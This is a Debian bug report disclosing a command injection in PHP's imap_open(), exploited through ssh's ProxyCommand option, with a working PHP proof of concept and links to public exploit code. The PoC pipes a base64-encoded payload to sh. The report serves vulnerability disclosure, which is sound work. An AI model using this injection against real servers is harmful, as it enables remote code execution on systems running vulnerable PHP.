Package: php-imap Version: 1:7.0+49 Severity: grave Tags: security Justification: user security hole
Dear Maintainer, A command injection vulnerability has been identified in the imap extension of php. It is located in the imap_open() function which does not validate correctly the server URI. imap_open() invokes rsh which is symlinked to ssh on Debian, it results in a possible command injection via the "-o ProxyCommand" option of ssh. A PoC is available : ``` <?php # https://antichat.com/threads/463395/#post-4254681 # echo '1234567890'>/tmp/test0001 $server = "x -oProxyCommand=echo\tZWNobyAnMTIzNDU2Nzg5MCc+L3RtcC90ZXN0MDAwMQo=|base64\t-d|sh}"; imap_open('{'.$server.':143/imap}INBOX', '', '') or die("\n\nError: ".imap_last_error()); ``` - Bo0om : PHP_imap_open_exploit https://github.com/Bo0oM/PHP_imap_open_exploit/blob/master/exploit.php - Antichat : [спущено с LVL8] RCE Task #3 https://antichat.com/threads/463395/#post-4254681 -- System Information: Debian Release: 9.5 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Foreign Architectures: i386 Kernel: Linux 4.9.0-8-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8), LANGUAGE=en_US:en (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages php-imap depends on: ii php-common 1:49 ii php7.0-imap 7.0.30-0+deb9u1 php-imap recommends no packages. php-imap suggests no packages. -- no debconf information